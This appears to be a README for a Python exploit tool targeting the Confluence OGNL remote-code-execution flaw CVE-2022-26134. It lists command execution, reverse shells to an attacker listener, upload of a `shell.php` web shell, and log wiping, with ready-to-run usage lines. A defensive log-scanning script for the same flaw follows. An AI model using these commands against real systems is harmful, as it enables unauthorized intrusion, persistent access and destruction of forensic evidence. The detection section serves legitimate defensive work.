✅ For educational purposes only. Do not use against systems you don't have explicit permission to test.
This is a full-featured Python exploit for the critical Unauthenticated Remote Code Execution (RCE) vulnerability in Atlassian Confluence, identified as CVE-2022-26134.
It leverages an OGNL injection vulnerability to execute arbitrary system commands, establish reverse shells, upload files, clean logs, and more.
✅ Command Execution (OGNL RCE)
✅ Interactive pseudo-shell
✅ Reverse Shell (bash / python / mkfifo)
✅ Auto-detect open outbound ports for reverse shell
✅ File Upload (via base64 encoding)
✅ Log Cleaning
✅ Logging to `exploit_log.txt`
- Confluence Server 7.3.5
- Python 3.x
- No authentication required
```bash
python3 exploit.py <TARGET_URL> [OPTIONS]
```

| Option | Description |
|---|---|
| `--cmd '<command>'` | Run a single command |
| `--shell` | Start interactive RCE shell |
| `--reverse <LHOST> <LPORT> [method]` | Send reverse shell (method: bash / python / mkfifo) |
| `--autors <LHOST>` | Auto-detect open port and send reverse shell |
| `--upload <local_file> <remote_path>` | Upload a file via base64 |
| `--cleanlogs` | Attempt to clean Confluence logs (basic) |
```bash
python3 exploit.py http://10.201.92.3:8090 --cmd 'id'

python3 exploit.py http://10.201.92.3:8090 --shell

nc -lvnp 4444
python3 exploit.py http://10.201.92.3:8090 --reverse 10.10.14.99 4444 bash

python3 exploit.py http://10.201.92.3:8090 --autors 10.10.14.99

python3 exploit.py http://10.201.92.3:8090 --upload shell.php /tmp/shell.php

python3 exploit.py http://10.201.92.3:8090 --cleanlogs
```

All executed commands and their results are automatically saved to `exploit_log.txt`.
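
On the detection side, CVE-2022-26134 carries its OGNL expression in the request URI, so access logs show a percent-encoded `${` in the path. The script below is an added example, not part of this tool: it scans access-log lines for that marker, including double-encoded forms. The log format, sample lines, and the function names `decode_fully` and `find_ognl_requests` are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in common access-log format (not from a real system).
# EXPRESSION_PLACEHOLDER stands in for whatever OGNL expression was sent.
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jun/2022:10:00:01 +0000] "GET /%24%7BEXPRESSION_PLACEHOLDER%7D/ HTTP/1.1" 302 -',
    '192.0.2.10 - - [03/Jun/2022:10:00:05 +0000] "GET /dashboard.action HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Jun/2022:10:00:09 +0000] "GET /%2524%257BEXPRESSION_PLACEHOLDER%257D/ HTTP/1.1" 404 -',
    '192.0.2.11 - - [03/Jun/2022:10:00:12 +0000] "GET /dosearchsite.action?queryString=100%25 HTTP/1.1" 200 812',
]

# Request line and status code inside an access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Opening delimiter of an OGNL expression once the URI is decoded.
OGNL_OPEN_RE = re.compile(r'\$\{')


def decode_fully(uri, max_rounds=3):
    """Percent-decode repeatedly so double-encoded delimiters are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def find_ognl_requests(lines):
    """Return one finding per request whose decoded URI contains '${'."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we can parse
        if OGNL_OPEN_RE.search(decode_fully(match["uri"])):
            findings.append({
                "line": lineno,
                "client": line.split()[0],
                "method": match["method"],
                "status": int(match["status"]),
                "uri": match["uri"],  # keep the raw form for the incident record
            })
    return findings


if __name__ == "__main__":
    for hit in find_ognl_requests(SAMPLE_LOG):
        print(hit)
```

Because the tool includes a `--cleanlogs` option, run a check like this against logs held off the Confluence host (reverse proxy or central log store) rather than only the server's local files.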
This tool is provided strictly for educational and authorized testing purposes.
- Do not use against systems without explicit permission.
- The author is not responsible for any misuse or damage.